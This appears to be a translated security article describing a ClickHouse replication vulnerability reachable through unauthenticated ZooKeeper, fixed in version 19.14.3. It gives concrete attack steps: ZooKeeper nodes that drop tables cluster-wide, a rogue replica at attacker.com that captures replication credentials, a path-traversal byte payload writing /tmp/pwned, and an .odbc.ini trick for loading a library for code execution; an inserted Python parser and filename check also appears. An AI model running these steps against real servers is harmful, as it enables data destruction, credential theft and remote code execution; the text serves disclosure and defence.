This article discusses a vulnerability found in the ClickHouse replication protocol and shows how the attack surface can be expanded.
ClickHouse is a database for storing large volumes of data, usually with more than one replica. Clustering and replication in ClickHouse are built on top of ZooKeeper (ZK).
The default ZK installation does not require authentication, so thousands of ZK servers used to configure Kafka, Hadoop and ClickHouse are publicly accessible.
To reduce your attack surface, you should always configure authentication and authorization when installing ZooKeeper.
Yes, there are Java deserialization 0days, but imagine that an attacker can read and write to the ZooKeeper used for ClickHouse replication.
When configured in cluster mode, ClickHouse supports distributed DDL queries via /clickhouse/task_queue/ddl.
For example, you create the node /clickhouse/task_queue/ddl/query-0001 with the contents:
version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']
and after that the test table will be dropped on the cluster servers host1 and host2. DDL also supports CREATE/ALTER/DROP queries.
Sounds scary? But where would an attacker get the server addresses? When a table is created with
CREATE TABLE foobar
(
`action_id` UInt32 DEFAULT toUInt32(0),
`status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;
the columns and metadata nodes will be created.
Contents of /clickhouse/tables/01/foobar/replicas/chXX/hosts:
host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http
Is it possible to pull data out of this cluster? Yes, if the replication port (TCP/9009) on the server chXX-address is not closed by a firewall and replication authentication is not configured. How is authentication bypassed?
An attacker can create a new replica in ZK by simply copying the contents of /clickhouse/tables/01-01/foobar/replicas/chXX and changing the host value.
Contents of /clickhouse/tables/01-01/foobar/replicas/attacker/host:
host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http
Then the other replicas need to be told that there is a new data block on the attacker's server that they have to fetch: a node /clickhouse/tables/01-01/foobar/log/log-00000000XX is created in ZK (XX is a monotonically increasing counter, which must be greater than the last one in the event log):
format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2
where source replica is the name of the attacker's replica created in the previous step, block_id is the data block identifier, and get is the "get block" command (and
Next, each replica reads the new event from the log and goes to the attacker-controlled server to fetch the data block (the replication protocol is binary and runs over HTTP). The server attacker.com will receive requests:
POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX
where XXX is the replication authentication data. In some cases this may be an account with access to the database via the main ClickHouse protocol and the HTTP protocol. As you can see, the attack surface becomes much larger because the ZooKeeper used for replication was left without authentication configured.
Let's look at the function that fetches a data block from a replica, written with full confidence that all replicas are under proper control and that there is trust between them.
(figure: replication handling code)
The function reads the list of files, their names, sizes and contents, and writes them to the file system. It is worth describing separately how data is stored on the file system.
There are several subdirectories in /var/lib/clickhouse (the default storage directory from the config file):
flags - directory for writing flags;
tmp - directory for storing temporary files;
user_files - operations with files in queries are restricted to this directory (INTO OUTFILE and others);
metadata - sql files with table definitions;
preprocessed_configs - processed configuration files from /etc/clickhouse-server;
data - the actual directory with the data itself, where a separate subdirectory is created for each database (for example /var/lib/clickhouse/data/default).
For each table, a subdirectory is created in the database directory. Each column is a separate file, depending on
action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2
When processing a data block, the replica expects to receive files with these same names and does not validate them in any way.
The attentive reader has probably already noticed the unsafe concatenation of file_name in the WriteBufferFromFile call. Yes, this lets an attacker write arbitrary content to any file on the FS with the privileges of the clickhouse user. To do this, the attacker-controlled replica must return the following response to the request (line breaks added for readability):
\x01
\x00\x00\x00\x00\x00\x00\x00\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper
and after the concatenation of ../../../../../../../../../tmp/pwned the file /tmp/pwned will be written with the contents hellofromzookeeper.
There are several options for turning the ability to write a file into remote code execution (RCE).
External dictionaries to RCE
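As an added illustration (not code from the article or from ClickHouse), here is a small Python parser for the response layout shown above together with the file-name check a receiving replica should apply before writing anything to disk. The byte layout it assumes is an 8-byte little-endian file count, then per file a varint-length name and an 8-byte little-endian content length; the sample bytes are the ones from the article assembled into one stream, and the expected file names are the ones listed for the foobar table.

```python
import os
import struct

# Part-file names a replica legitimately expects for the foobar table above.
EXPECTED_PART_FILES = {
    "action_id.bin", "action_id.mrk2", "checksums.txt", "columns.txt",
    "count.txt", "primary.idx", "status.bin", "status.mrk2",
}


def _read_varuint(buf, pos):
    """Decode a LEB128-style unsigned varint; return (value, new_pos)."""
    value, shift = 0, 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7


def parse_parts_exchange(payload):
    """Parse a DataPartsExchange body into (file_name, contents) pairs.
    Assumed layout: UInt64 LE count; per file varint name, UInt64 LE size, bytes."""
    count = struct.unpack_from("<Q", payload, 0)[0]
    pos, files = 8, []
    for _ in range(count):
        name_len, pos = _read_varuint(payload, pos)
        name = payload[pos:pos + name_len].decode("utf-8")
        pos += name_len
        size = struct.unpack_from("<Q", payload, pos)[0]
        pos += 8
        files.append((name, payload[pos:pos + size]))
        pos += size
    return files


def is_safe_part_file(name, part_dir):
    """Hardened check before writing a received file: only a bare, expected
    file name whose resolved path stays inside the part directory."""
    if name not in EXPECTED_PART_FILES or os.path.basename(name) != name:
        return False
    target = os.path.realpath(os.path.join(part_dir, name))
    return os.path.dirname(target) == os.path.realpath(part_dir)


# Constructed sample: the single-file response from the article, as one stream.
MALICIOUS_RESPONSE = (b"\x01" + b"\x00" * 7 + b"\x24"
                      + b"../../../../../../../../../tmp/pwned"
                      + b"\x12" + b"\x00" * 7 + b"hellofromzookeeper")
```

Running parse_parts_exchange on MALICIOUS_RESPONSE yields the traversal name from the article, and is_safe_part_file rejects it while accepting a bare checksums.txt.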
In older versions, the directory with ClickHouse settings was owned by the clickhouse user by default. The configuration files are XML files that the service reads at startup and then caches in /var/lib/clickhouse/preprocessed_configs. When they change, they are re-read. With access to /etc/clickhouse-server, an attacker can create their own root
.
ODBC to RCE
When the package is installed, the clickhouse user is created, but its home directory /nonexistent is not. However, when using external dictionaries, or for other reasons, administrators create the /nonexistent directory and give the clickhouse user write access to it (SSZB! translator's note).
ClickHouse supports odbc-bridge, so it is no longer possible to specify the driver path in the query. But can an attacker write to the home directory using the vulnerability described above?
Let's create a file ~/.odbc.ini with contents like this:
[lalala]
Driver=/var/lib/clickhouse/user_files/test.so
and then, when running SELECT * FROM odbc('DSN=lalala', 'test', 'test');
the test.so library will be loaded and we get RCE (thanks
This and other vulnerabilities were fixed in ClickHouse version 19.14.3. Take care of your ClickHouse and your ZooKeepers!
Source: www.habr.com